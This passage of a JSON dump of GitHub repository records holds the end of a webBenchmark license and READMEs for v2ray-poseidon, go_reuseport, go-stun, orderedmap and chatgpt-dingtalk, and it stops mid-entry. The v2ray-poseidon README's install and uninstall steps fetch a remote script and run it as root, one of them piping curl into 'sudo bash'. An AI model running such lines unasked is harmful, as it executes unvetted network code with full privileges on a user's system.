Intellectual Property**\n\nYou recognize that all rights, title and interests in and to any and all worldwide Intellectual Property Rights related to the webBenchmark shall remain the property of Licensor or its suppliers. Unless otherwise agreed upon between the Parties, any Intellectual Property Rights in any Updates, contributions, enhancements, customization, modifications, inventions, developments, improvements thereof of any kind to, in, or that otherwise relate to the webBenchmark, including any Derivative Work or results of agreed services during, before or after the term of this License, either specific to You, Your customer or in general in connection with this License or arising out of the business relationship between the Parties shall solely and exclusively belong to or be transferred to Licensor through assignment, entitlement or otherwise, including the entire right, title and interest. For this purpose, Licensor shall also have the right to file and prosecute at its own expenses any patent application on the same above, in any country, region or jurisdiction in the world in its own name or on behalf of You, as the case may be. You shall not have the right to claim and will not undertake or try to obtain, register or apply for any Intellectual Property Rights or other rights in or to the webBenchmark or Derivative Works anywhere in the world. You shall not do anything that might misrepresent, change or otherwise compromises the ownership or proprietary rights of Licensor or its suppliers under this License. You shall not take any actions that would amount to an exhaustion of Licensor's or its suppliers Intellectual Property Rights. The webBenchmark may contain the logo and copyright notice of Licensor. It is prohibited to remove or modify the copyright notice and webBenchmark logo of Licensor.\n\n**9. Disclaimer of Warranty.**\n\nUnless required by applicable law or agreed by the Parties in writing, Licensor provides the webBenchmark AND any RELATEd SERVICE on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, STATUTORY OR OTHERWISE, including, without limitation, any warranties or conditions of THE webBenchmark ACCURACY, TITLE, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE OR NON-INFRINGEMENT. THE LICENSOR DOES NOT PROVIDE ANY WARRANTY AS TO QUALITY, SUITABILITY, FEATURES, COMPATIBILITY OF THE webBenchmark AND RELATED SERVICES. THIS AGREEMENT DOES NOT PROVIDE ANY REPRESENTATION OR WARRANTY OR LIABILITY AS TO ANY THIRD-PARTY SOFTWARE.\n\n**10. Third Party Software Disclaimer**\n\nThe webBenchmark may make reference to third party standard software (e.g. open source software and video test streams) which is not developed by Licensor, but which are provided in connection with the Purpose of the integration or testing of the maintell. For the avoidance of doubt, Licensor is not a sub licensor of such third party software. Licensor refers Licensee to applicable attribution files and license terms disclosures and pertinent terms of the respective third-party standard software publisher which apply directly to Licensee. However, Parties will ensure their compliance with such relevant licensing terms.\n\nTHIS THIRD-PARTY SOFTWARE IS PROVIDED BY THE RESPECTIVE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS THIRD PARTY SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n**11. Limitation of Liability.**\n\nYou are solely responsible or liable for determining the appropriateness of Using the webBenchmark AND RELATED SERVICES and assume any risks associated with Your exercise of permissions under this License and the creation of Derivative Works. Licensor shall have no liability of any kind with regards TO such Derivative Works.\n\nIn no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall Licensor be liable to You for damages OF ANY KIND, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the webBenchmark or Derivative Works, including but not limited to damages for loss of goodwill, LOST REVENUE, LOST PROFIT, LOST DATA OR CORRUPTED DATA, COSTS OF PROCUREMENT FOR SUBSTITUTION OF PRODUCTS OR SERVICES, THIRD PARTY SOFTWARE AND CLAIMS, PROVIDED INFORMATION, WASTED MANAGEMENT TIME, LOSS OF USE OF COMPUTER SYSTEMS AND RELATED EQUIPMENT, COMPUTER FAILURE AND MALFUNCTIONS, DOWNTIME COST, work stoppage, or any and all other commercial damages or losses, even if such the Licensor or the Contributor has been advised of the possibility of such damages.\n\nTHE PROVISIONS OF THIS CLAUSE TITLED \"LIMITATION OF LIABILITY\" SHALL NOT APPLY TO THE EXTENT RESTRICTED OR PREVENTED BY MANDATORY APPLICABLE LAW THAT CANNOT BE AMENDED OR EXCLUDED BY CONTRACTUAL WAIVER SUCH AS DELIBERATE ACTS AND FRAUD.\n\n**12. Derivative Work**\n\nWhile creating and using Derivative Works, if you choose to offer additional warranty, indemnity, or other liability obligations and/or rights inconsistent with this License, You act only on Your own behalf and on Your sole responsibility, not on behalf of the Licensor. You agree to indemnify, defend, and hold the Licensor harmless for any liability incurred by, or claims asserted against, the Licensor by reason of your accepting any such warranty or additional obligations and liability.\n\n**13. Third Parties**\n\nThe Licensor will not indemnify nor hold harmless You against any infringements of any rights of third parties with respect to the webBenchmark or the Derivative Works.\n\nLicensor shall have no obligation for payment of royalties or any other compensation to You or third parties, if any, with respect to the Use of the webBenchmark by You or Your customers, clients, viewers, listeners for playing media content or in connection with third party products and software. You will be exclusively responsible for payment of royalties to third parties.\n\n**14. Legal Capacity**\n\nBy accepting this License, You represent and warrant to have the legal capacity and authority to enter into this legally binding License.\n\n**15. No Implied Rights**\n\nOther than expressly provided for in this License, nothing in this License grants or shall be construed to grant to any Party any right and/or any license to any Intellectual Property Right or application therefore (including but not limited to patent applications or patents) which are held by and/or in the name of the other Party and/or which are controlled by the other Party, or to any Confidential Information received from the other Party.\n\n**16. Indemnification**\n\nYou agree, at Licensor's option, to release, defend, indemnify, and hold Licensor and its affiliates and subsidiaries, and their officers, directors, employees, contractors and agents, harmless from and against any claims, liabilities, damages, losses, and expenses, including, without limitation, reasonable legal and accounting fees, arising out of or in any way connected with (i) Your breach of this License (ii) Your negligent or improper use, misuse or intentional omission in connection with the use of the webBenchmark or any of Licensor's services.\n\n**17. Notices**\n\nAll notices or other communication required or permitted to be given in writing under this License must be given in the English and Chinese language by email.\n\n**18. Waivers**\n\nNo failure or delay by any Party in exercising any right or remedy provided by law or pursuant to this License will impair such right or remedy or be construed as a waiver of it and will not preclude its exercise at any subsequent time and no single or partial exercise of any such right or remedy will preclude any further exercise of it or the exercise of any other remedy.\n\n**19. Severability**\n\nIf any provision of this License or of any of the documents contemplated in it is held to be invalid or unenforceable, then such provision will (so far as it is invalid or unenforceable) have no effect and will be deemed not to be included in this License or the relevant document, but without invalidating any of the remaining provisions of this License or that document. The Parties must then use all reasonable endeavors to replace the invalid or unenforceable provision by a valid and enforceable substitute provision the effect of which is as close as possible to the intended effect of the invalid or unenforceable provision.\n\n**20. Modifications**\n\nThe Licensor may modify the terms of this License in its sole discretion and such modifications shall take effect and be binding on You on the earliest date which they are posted to the Platform. No one other than the Licensor has the right to modify this License.\n\n**21. GOVERNING LAW AND JURISDICTION**\n\nThe License is governed by and must be construed, interpreted in accordance with the laws of CHINA without given effect to the conflict of law principles thereof. The courts of CHINA have exclusive jurisdiction over any dispute, legal action and proceedings arising out of or related to the License, including its termination, which shall be binding and enforceable upon the Parties worldwide. In the event of any proceeding or litigation arising out of this License, the prevailing Party shall be entitled to recover from the non-prevailing Party its legal fees, court fees and related costs to the extent and in ratio of its success. Notwithstanding the foregoing, Licensor may bring legal actions against You in the country where You has its seat, if it deems necessary for the enforceability of its rights regarding payments by You under the License.\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ColetteContreras/v2ray-poseidon", "link": "https://github.com/ColetteContreras/v2ray-poseidon", "tags": ["v2ray", "ssrpanel", "plugin", "v2board", "sspanel", "v2ray-poseidon", "sspanel-v3", "sspanel-uim"], "stars": 557, "description": "An Enhanced V2Ray(based on v2ray-core) for VNetPanel, SSRPanel, V2board and SSPanel-v3-Uim to sync users from database to v2ray, to log traffics/system info", "lang": "Go", "repo_lang": "", "readme": "# Poseidon -- An Enhanced V2Ray(based on v2ray-core)\n\n# \u6ce8\u610f\uff1a\u672c\u9879\u76ee\u5df2\u4e8e 2021\u5e74\u4e0b\u7ebf\uff0c\u6ca1\u6709\u4efb\u4f55Telegram\u5e10\u6237\uff0c\u4e5f\u6ca1\u6709\u4efb\u4f55\u9500\u552e\u4eba\u5458,\u6240\u6709\u4ee5 Poseidon \u6ce2\u585e\u51ac\u540d\u4e49\u7684\u5747\u4e3a\u9a97\u5b50\uff0c\u8bf7\u52ff\u76f8\u4fe1\uff0c\u76ee\u524d\u5df2\u6709\u4eba\u88ab\u9a97\n# \u6ce8\u610f\uff1a\u672c\u9879\u76ee\u5df2\u4e8e 2021\u5e74\u4e0b\u7ebf\uff0c\u6ca1\u6709\u4efb\u4f55Telegram\u5e10\u6237\uff0c\u4e5f\u6ca1\u6709\u4efb\u4f55\u9500\u552e\u4eba\u5458,\u6240\u6709\u4ee5 Poseidon \u6ce2\u585e\u51ac\u540d\u4e49\u7684\u5747\u4e3a\u9a97\u5b50\uff0c\u8bf7\u52ff\u76f8\u4fe1\uff0c\u76ee\u524d\u5df2\u6709\u4eba\u88ab\u9a97\n# \u6ce8\u610f\uff1a\u672c\u9879\u76ee\u5df2\u4e8e 2021\u5e74\u4e0b\u7ebf\uff0c\u6ca1\u6709\u4efb\u4f55Telegram\u5e10\u6237\uff0c\u4e5f\u6ca1\u6709\u4efb\u4f55\u9500\u552e\u4eba\u5458,\u6240\u6709\u4ee5 Poseidon \u6ce2\u585e\u51ac\u540d\u4e49\u7684\u5747\u4e3a\u9a97\u5b50\uff0c\u8bf7\u52ff\u76f8\u4fe1\uff0c\u76ee\u524d\u5df2\u6709\u4eba\u88ab\u9a97\n#\n# \u4f5c\u8005\u552f\u4e00\u90ae\u7bb1\uff08\u6240\u6709\u8d2d\u4e70\u8fc7\u7684\uff0c\u5747\u53ef\u53d1\u9001\u90ae\u4ef6\u514d\u8d39\u83b7\u53d6\u6c38\u4e45\u79bb\u7ebf\u6388\u6743\uff0c\u9700\u8981\u63d0\u4f9b\u539f\u6388\u6743\u7801\u53ca\u57df\u540d\u7b49\u4fe1\u606f\uff0c\u56de\u590d\u5468\u671f\u4e00\u4e2a\u6708\u4ee5\u5185\uff0c\u4e00\u5c01\u5982\u679c\u672a\u56de\u590d\u53ef\u8fc7\u4e00\u5468\u518d\u53d1\u4e00\u6b21\uff09 ColetteContreras@outlook.com\nSupport SSRPanel(VNetPanel), V2board, SSpanel-v3-Uim\n\n### Features\n\n- Sync user from your panel to v2ray\n- Log user traffic\n- Limit traffic rate ( speed limit )\n- Limit online IP count\n- And other optimizations\n\n### Benefits\n\n- No other requirements\n - It's able to run if you could launch v2ray core\n- Less memory usage\n - It just takes about 5MB to 10MB memories more than v2ray core\n - Small RAM VPS would be joyful\n- Simplicity configuration\n\n\n### Install on Linux\n\n```\ncurl -o go.sh -L -s https://raw.githubusercontent.com/ColetteContreras/v2ray-poseidon/master/install-release.sh\nsudo bash go.sh # Install latest version of v2ray-poseidon\nOR\nsudo bash go.sh --version v1.5.3 # Install target version of v2ray-poseidon\n```\n\n#### Uninstall\n\n```\ncurl -L -s https://raw.githubusercontent.com/ColetteContreras/v2ray-poseidon/master/uninstall.sh | sudo bash\n```\n\n### Contact\n\nGet in touch via [TG group: v2ray_poseidon](https://t.me/v2ray_poseidon)\n\n### Acknowledgement\n\n- [V2ray](https://github.com/v2ray/v2ray-core)\n- [SSRPanel](https://github.com/ssrpanel/SSRPanel)\n- [V2board](https://github.com/v2board/v2board)\n- [SSPanel-v3-Uim](https://github.com/Anankke/SSPanel-Uim)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kubernetes-sigs/aws-efs-csi-driver", "link": "https://github.com/kubernetes-sigs/aws-efs-csi-driver", "tags": ["aws", "efs", "csi", "kubernetes", "k8s-sig-aws"], "stars": 557, "description": "CSI Driver for Amazon EFS https://aws.amazon.com/efs/", "lang": "Go", "repo_lang": "", "readme": "", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kavu/go_reuseport", "link": "https://github.com/kavu/go_reuseport", "tags": ["go"], "stars": 556, "description": "Brings SO_REUSEPORT into your Go server", "lang": "Go", "repo_lang": "", "readme": "# GO_REUSEPORT\n\n[![Build Status](https://travis-ci.org/kavu/go_reuseport.png?branch=master)](https://travis-ci.org/kavu/go_reuseport)\n[![codecov](https://codecov.io/gh/kavu/go_reuseport/branch/master/graph/badge.svg)](https://codecov.io/gh/kavu/go_reuseport)\n[![GoDoc](https://godoc.org/github.com/kavu/go_reuseport?status.png)](https://godoc.org/github.com/kavu/go_reuseport)\n\n**GO_REUSEPORT** is a little expirement to create a `net.Listener` that supports [SO_REUSEPORT](http://lwn.net/Articles/542629/) socket option.\n\nFor now, Darwin and Linux (from 3.9) systems are supported. I'll be pleased if you'll test other systems and tell me the results.\n documentation on [godoc.org](http://godoc.org/github.com/kavu/go_reuseport \"go_reuseport documentation\").\n\n## Example ##\n\n```go\npackage main\n\nimport (\n \"fmt\"\n \"html\"\n \"net/http\"\n \"os\"\n \"runtime\"\n \"github.com/kavu/go_reuseport\"\n)\n\nfunc main() {\n listener, err := reuseport.Listen(\"tcp\", \"localhost:8881\")\n if err != nil {\n panic(err)\n }\n defer listener.Close()\n\n server := &http.Server{}\n http.HandleFunc(\"/\", func(w http.ResponseWriter, r *http.Request) {\n fmt.Println(os.Getgid())\n fmt.Fprintf(w, \"Hello, %q\\n\", html.EscapeString(r.URL.Path))\n })\n\n panic(server.Serve(listener))\n}\n```\n\nNow you can run several instances of this tiny server without `Address already in use` errors.\n\n## Thanks\n\nInspired by [Artur Siekielski](https://github.com/aartur) [post](http://freeprogrammersblog.vhex.net/post/linux-39-introdued-new-way-of-writing-socket-servers/2) about `SO_REUSEPORT`.\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ccding/go-stun", "link": "https://github.com/ccding/go-stun", "tags": ["stun", "go", "nat-traversal", "rfc-5389", "webrtc", "golang"], "stars": 556, "description": "A go implementation of the STUN client (RFC 3489 and RFC 5389)", "lang": "Go", "repo_lang": "", "readme": "go-stun\n=======\n\n[![Build Status](https://travis-ci.org/ccding/go-stun.svg?branch=master)](https://travis-ci.org/ccding/go-stun)\n[![License](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://opensource.org/licenses/Apache-2.0)\n[![GoDoc](https://godoc.org/github.com/ccding/go-stun?status.svg)](http://godoc.org/github.com/ccding/go-stun/stun)\n[![Go Report Card](https://goreportcard.com/badge/github.com/ccding/go-stun)](https://goreportcard.com/report/github.com/ccding/go-stun)\n\ngo-stun is a STUN (RFC 3489, 5389) client implementation in golang\n(a.k.a. UDP hole punching).\n\n[RFC 3489](https://tools.ietf.org/html/rfc3489):\nSTUN - Simple Traversal of User Datagram Protocol (UDP)\nThrough Network Address Translators (NATs)\n\n[RFC 5389](https://tools.ietf.org/html/rfc5389):\nSession Traversal Utilities for NAT (STUN)\n\n### Use the Command Line Tool\n\nSimply run these commands (if you have installed golang and set `$GOPATH`)\n```\ngo get github.com/ccding/go-stun\ngo-stun\n```\nor clone this repo and run these commands\n```\ngo build\n./go-stun\n```\nYou will get the output like\n```\nNAT Type: Full cone NAT\nExternal IP Family: 1\nExternal IP: 166.111.4.100\nExternal Port: 23009\n```\nYou can use `-s` flag to use another STUN server, and use `-v` to work on\nverbose mode.\n```bash\n> ./go-stun --help\nUsage of ./go-stun:\n -s string\n server address (default \"stun1.l.google.com:19302\")\n -v verbose mode\n```\n\n### Use the Library\n\nThe library `github.com/ccding/go-stun/stun` is extremely easy to use -- just\none line of code.\n\n```go\nimport \"github.com/ccding/go-stun/stun\"\n\nfunc main() {\n\tnat, host, err := stun.NewClient().Discover()\n}\n```\n\nMore details please go to `main.go` and [GoDoc](http://godoc.org/github.com/ccding/go-stun/stun)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "elliotchance/orderedmap", "link": "https://github.com/elliotchance/orderedmap", "tags": ["golang", "data-structures", "maps", "orderedmap"], "stars": 556, "description": "\ud83d\udd03 An ordered map in Go with amortized O(1) for Set, Get, Delete and Len.", "lang": "Go", "repo_lang": "", "readme": "# \ud83d\udd03 github.com/elliotchance/orderedmap/v2 [![GoDoc](https://godoc.org/github.com/elliotchance/orderedmap/v2?status.svg)](https://godoc.org/github.com/elliotchance/orderedmap/v2)\n\n## Basic Usage\n\nAn `*OrderedMap` is a high performance ordered map that maintains amortized O(1)\nfor `Set`, `Get`, `Delete` and `Len`:\n\n```go\nimport \"github.com/elliotchance/orderedmap/v2\"\n\nfunc main() {\n\tm := orderedmap.NewOrderedMap[string, any]()\n\n\tm.Set(\"foo\", \"bar\")\n\tm.Set(\"qux\", 1.23)\n\tm.Set(\"123\", true)\n\n\tm.Delete(\"qux\")\n}\n```\n\n*Note: v2 requires Go v1.18 for generics.* If you need to support Go 1.17 or\nbelow, you can use v1.\n\nInternally an `*OrderedMap` uses the composite type\n[map](https://go.dev/blog/maps) combined with a\ntrimmed down linked list to maintain the order.\n\n## Iterating\n\nBe careful using `Keys()` as it will create a copy of all of the keys so it's\nonly suitable for a small number of items:\n\n```go\nfor _, key := range m.Keys() {\n\tvalue, _:= m.Get(key)\n\tfmt.Println(key, value)\n}\n```\n\nFor larger maps you should use `Front()` or `Back()` to iterate per element:\n\n```go\n// Iterate through all elements from oldest to newest:\nfor el := m.Front(); el != nil; el = el.Next() {\n fmt.Println(el.Key, el.Value)\n}\n\n// You can also use Back and Prev to iterate in reverse:\nfor el := m.Back(); el != nil; el = el.Prev() {\n fmt.Println(el.Key, el.Value)\n}\n```\n\nThe iterator is safe to use bidirectionally, and will return `nil` once it goes\nbeyond the first or last item.\n\nIf the map is changing while the iteration is in-flight it may produce\nunexpected behavior.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "eryajf/chatgpt-dingtalk", "link": "https://github.com/eryajf/chatgpt-dingtalk", "tags": ["chatgpt", "chatgpt-api", "dingtalk", "dingtalk-robot"], "stars": 557, "description": "ChatGPT\u673a\u5668\u4eba\u5728\u9489\u9489\u7fa4\u804a\u4e2d\u4ea4\u4e92", "lang": "Go", "repo_lang": "", "readme": "
\n

ChatGPT Dingtalk

\n\n[![Auth](https://img.shields.io/badge/Auth-eryajf-ff69b4)](https://github.com/eryajf)\n[![Go Version](https://img.shields.io/github/go-mod/go-version/eryajf/chatgpt-dingtalk)](https://github.com/eryajf/chatgpt-dingtalk)\n[![GitHub Pull Requests](https://img.shields.io/github/issues-pr/eryajf/chatgpt-dingtalk)](https://github.com/eryajf/chatgpt-dingtalk/pulls)\n[![GitHub Pull Requests](https://img.shields.io/github/stars/eryajf/chatgpt-dingtalk)](https://github.com/eryajf/chatgpt-dingtalk/stargazers)\n[![HitCount](https://views.whatilearened.today/views/github/eryajf/chatgpt-dingtalk.svg)](https://github.com/eryajf/chatgpt-dingtalk)\n[![Docker Image Size (latest by date)](https://img.shields.io/docker/image-size/eryajf/chatgpt-dingtalk)](https://hub.docker.com/r/eryajf/chatgpt-dingtalk)\n[![Docker Pulls](https://img.shields.io/docker/pulls/eryajf/chatgpt-dingtalk)](https://hub.docker.com/r/eryajf/chatgpt-dingtalk)\n[![GitHub license](https://img.shields.io/github/license/eryajf/chatgpt-dingtalk)](https://github.com/eryajf/chatgpt-dingtalk/blob/main/LICENSE)\n\n

\ud83c\udf09 \u5728\u9489\u9489\u7fa4\u804a\u4e2d\u6dfb\u52a0ChatGPT\u673a\u5668\u4eba \ud83c\udf09

\n\n\n

\n\n\n## \u524d\u8a00\n\n\u6700\u8fd1ChatGPT\u5f02\u5e38\u706b\u7206\uff0c\u672c\u9879\u76ee\u53ef\u4ee5\u52a9\u4f60\u5c06GPT\u673a\u5668\u4eba\u96c6\u6210\u5230\u9489\u9489\u7fa4\u804a\u4e2d\u3002\n\n\n> \ud83e\udd73 **\u6b22\u8fce\u5173\u6ce8\u6211\u7684\u5176\u4ed6\u5f00\u6e90\u9879\u76ee\uff1a**\n>\n> - [Go-Ldap-Admin](https://github.com/eryajf/go-ldap-admin)\uff1a\ud83c\udf09 \u57fa\u4e8eGo+Vue\u5b9e\u73b0\u7684openLDAP\u540e\u53f0\u7ba1\u7406\u9879\u76ee\u3002\n> - [learning-weekly](https://github.com/eryajf/learning-weekly)\uff1a\ud83d\udcdd \u5468\u520a\u5185\u5bb9\u4ee5\u8fd0\u7ef4\u6280\u672f\u548cGo\u8bed\u8a00\u5468\u8fb9\u4e3a\u4e3b\uff0c\u8f85\u4ee5GitHub\u4e0a\u4f18\u79c0\u9879\u76ee\u6216\u4ed6\u4eba\u4f18\u79c0\u7ecf\u9a8c\u3002\n> - [HowToStartOpenSource](https://github.com/eryajf/HowToStartOpenSource)\uff1a\ud83c\udf08 GitHub\u5f00\u6e90\u9879\u76ee\u7ef4\u62a4\u534f\u540c\u6307\u5357\u3002\n> - [read-list](https://github.com/eryajf/read-list)\uff1a\ud83d\udcd6 \u4f18\u8d28\u5185\u5bb9\u8ba2\u9605\uff0c\u9605\u8bfb\u65b9\u4e3a\u6839\u672c\n> - [awesome-github-profile-readme-chinese](https://github.com/eryajf/awesome-github-profile-readme-chinese)\uff1a\ud83e\udda9 \u4f18\u79c0\u7684\u4e2d\u6587\u533a\u4e2a\u4eba\u4e3b\u9875\u641c\u96c6\n\n\n## \u529f\u80fd\u7b80\u4ecb\n\n* \u652f\u6301\u5728\u9489\u9489\u7fa4\u804a\u4e2d\u6dfb\u52a0\u673a\u5668\u4eba\uff0c\u901a\u8fc7@\u673a\u5668\u4eba\u8fdb\u884c\u804a\u5929\u4ea4\u4e92\u3002\n* \u63d0\u95ee\u652f\u6301\u5355\u804a\u4e0e\u4e32\u804a\u4e24\u79cd\u6a21\u5f0f\uff0c\u901a\u8fc7@\u673a\u5668\u4eba\u53d1\u5173\u952e\u5b57\u5207\u6362\u3002\n\n## \u4f7f\u7528\u524d\u63d0\n\n* \u6709Openai\u8d26\u53f7\uff0c\u5e76\u4e14\u521b\u5efa\u597d`api_key`\uff0c\u6ce8\u518c\u76f8\u5173\u4e8b\u9879\u53ef\u4ee5\u53c2\u8003[\u6b64\u6587\u7ae0](https://juejin.cn/post/7173447848292253704) \u3002\u8bbf\u95ee[\u8fd9\u91cc](https://beta.openai.com/account/api-keys)\uff0c\u7533\u8bf7\u4e2a\u4eba\u79d8\u94a5\u3002\n* \u5728\u9489\u9489\u5f00\u53d1\u8005\u540e\u53f0\u521b\u5efa\u673a\u5668\u4eba\uff0c\u914d\u7f6e\u5e94\u7528\u7a0b\u5e8f\u56de\u8c03\u3002\n\n## \u4f7f\u7528\u6559\u7a0b\n\n### \u7b2c\u4e00\u6b65\uff0c\u5148\u521b\u5efa\u673a\u5668\u4eba\n\n\u521b\u5efa\u6b65\u9aa4\u53c2\u8003\u6587\u6863\uff1a[\u4f01\u4e1a\u5185\u90e8\u5f00\u53d1\u673a\u5668\u4eba](https://open.dingtalk.com/document/robots/enterprise-created-chatbot)\uff0c\u6216\u8005\u6839\u636e\u5982\u4e0b\u6b65\u9aa4\u8fdb\u884c\u914d\u7f6e\u3002\n\n1. \u521b\u5efa\u673a\u5668\u4eba\u3002\n ![image_20221209_163616](https://cdn.staticaly.com/gh/eryajf/tu/main/img/image_20221209_163616.png)\n\n > `\ud83d\udce2 \u6ce8\u610f1\uff1a`\u53ef\u80fd\u73b0\u5728\u521b\u5efa\u673a\u5668\u4eba\u7684\u65f6\u5019\u540d\u5b57\u4e3a`chatgpt`\u4f1a\u88ab\u9489\u9489\u9650\u5236\uff0c\u8bf7\u7528\u5176\u4ed6\u540d\u5b57\u547d\u540d\u3002\n > `\ud83d\udce2 \u6ce8\u610f2\uff1a`\u7b2c\u56db\u6b65\u9aa4\u70b9\u51fb\u521b\u5efa\u5e94\u7528\u7684\u65f6\u5019\uff0c\u52a1\u5fc5\u9009\u62e9\u4f7f\u7528\u65e7\u7248\uff0c\u4ece\u800c\u521b\u5efa\u65e7\u7248\u673a\u5668\u4eba\u3002\n\n \u6b65\u9aa4\u6bd4\u8f83\u7b80\u5355\uff0c\u8fd9\u91cc\u5c31\u4e0d\u8d58\u8ff0\u4e86\u3002\n\n2. \u914d\u7f6e\u673a\u5668\u4eba\u56de\u8c03\u63a5\u53e3\u3002\n ![image_20221209_163652](https://cdn.staticaly.com/gh/eryajf/tu/main/img/image_20221209_163652.png)\n\n \u521b\u5efa\u5b8c\u6bd5\u4e4b\u540e\uff0c\u70b9\u51fb\u673a\u5668\u4eba\u5f00\u53d1\u7ba1\u7406\uff0c\u7136\u540e\u914d\u7f6e\u5c06\u8981\u90e8\u7f72\u7684\u670d\u52a1\u6240\u5728\u670d\u52a1\u5668\u7684\u51fa\u53e3IP\uff0c\u4ee5\u53ca\u5c06\u8981\u7ed9\u670d\u52a1\u914d\u7f6e\u7684\u57df\u540d\u3002\n\n3. \u53d1\u5e03\u673a\u5668\u4eba\u3002\n ![image_20221209_163709](https://cdn.staticaly.com/gh/eryajf/tu/main/img/image_20221209_163709.png)\n\n \u70b9\u51fb\u7248\u672c\u7ba1\u7406\u4e0e\u53d1\u5e03\uff0c\u7136\u540e\u70b9\u51fb\u4e0a\u7ebf\uff0c\u8fd9\u4e2a\u65f6\u5019\u5c31\u80fd\u5728\u9489\u9489\u7684\u7fa4\u91cc\u4e2d\u6dfb\u52a0\u8fd9\u4e2a\u673a\u5668\u4eba\u4e86\u3002\n\n4. \u7fa4\u804a\u6dfb\u52a0\u673a\u5668\u4eba\u3002\n\n ![image_20221209_163724](https://cdn.staticaly.com/gh/eryajf/tu/main/img/image_20221209_163724.png)\n\n### \u7b2c\u4e8c\u6b65\uff0c\u90e8\u7f72\u5e94\u7528\n\n\u4f60\u53ef\u4ee5\u4f7f\u7528docker\u5feb\u901f\u8fd0\u884c\u672c\u9879\u76ee\u3002\n\n`\u7b2c\u4e00\u79cd\uff1a\u57fa\u4e8e\u73af\u5883\u53d8\u91cf\u8fd0\u884c`\n\n```sh\n# \u8fd0\u884c\u9879\u76ee\n$ docker run -itd --name chatgpt -p 8090:8090 -e APIKEY=\u6362\u6210\u4f60\u7684key -e SESSION_TIMEOUT=600 --restart=always dockerproxy.com/eryajf/chatgpt-dingtalk:latest\n```\n\n\u8fd0\u884c\u547d\u4ee4\u4e2d\u6620\u5c04\u7684\u914d\u7f6e\u6587\u4ef6\u53c2\u8003\u4e0b\u8fb9\u7684\u914d\u7f6e\u6587\u4ef6\u8bf4\u660e\u3002\n\n`\u7b2c\u4e8c\u79cd\uff1a\u57fa\u4e8e\u914d\u7f6e\u6587\u4ef6\u6302\u8f7d\u8fd0\u884c`\n\n```sh\n# \u590d\u5236\u914d\u7f6e\u6587\u4ef6\uff0c\u6839\u636e\u81ea\u5df1\u5b9e\u9645\u60c5\u51b5\uff0c\u8c03\u6574\u914d\u7f6e\u91cc\u7684\u5185\u5bb9\n$ cp config.dev.json config.json # \u5176\u4e2d config.dev.json \u4ece\u9879\u76ee\u7684\u6839\u76ee\u5f55\u83b7\u53d6\n\n# \u8fd0\u884c\u9879\u76ee\n$ docker run -itd --name chatgpt -p 8090:8090 -v `pwd`/config.json:/app/config.json --restart=always dockerproxy.com/eryajf/chatgpt-dingtalk:latest\n```\n\n\u5176\u4e2d\u914d\u7f6e\u6587\u4ef6\u53c2\u8003\u4e0b\u8fb9\u7684\u914d\u7f6e\u6587\u4ef6\u8bf4\u660e\u3002\n\n\u6ce8\u610f\uff0c\u4e0d\u8bba\u901a\u8fc7\u4e0a\u8fb9\u54ea\u79cddocker\u65b9\u5f0f\u90e8\u7f72\uff0c\u90fd\u9700\u8981\u914d\u7f6eNginx\u4ee3\u7406\uff0c\u5f53\u7136\u4f60\u76f4\u63a5\u901a\u8fc7\u670d\u52a1\u5668\u5916\u7f51IP\u4e5f\u53ef\u4ee5\u3002\n\n\u90e8\u7f72\u5b8c\u6210\u4e4b\u540e\uff0c\u901a\u8fc7Nginx\u4ee3\u7406\u672c\u670d\u52a1\uff1a\n\n```nginx\nserver {\n listen 80;\n server_name chat.eryajf.net;\n\n client_header_timeout 120s;\n client_body_timeout 120s;\n\n location / {\n proxy_set_header Host $host;\n proxy_set_header X-Real-IP $remote_addr;\n proxy_set_header X-Forwarded-Proto $scheme;\n proxy_set_header X-Forwarded-For $remote_addr;\n proxy_pass http://localhost:8090;\n }\n}\n```\n\n\u90e8\u7f72\u5b8c\u6210\u4e4b\u540e\uff0c\u5c31\u53ef\u4ee5\u5728\u7fa4\u91cc\u827e\u7279\u673a\u5668\u4eba\u8fdb\u884c\u4f53\u9a8c\u4e86\u3002\n\nNginx\u914d\u7f6e\u5b8c\u6bd5\u4e4b\u540e\uff0c\u53ef\u4ee5\u5148\u624b\u52a8\u8bf7\u6c42\u4e00\u4e0b\uff0c\u901a\u8fc7\u670d\u52a1\u65e5\u5fd7\u8f93\u51fa\u5224\u65ad\u670d\u52a1\u662f\u5426\u6b63\u5e38\u53ef\u7528\uff1a\n\n```sh\n$ curl --location --request POST 'http://chat.eryajf.net/' \\\n --header 'Content-type: application/json' \\\n --data-raw '{\n \"conversationId\": \"xxx\",\n 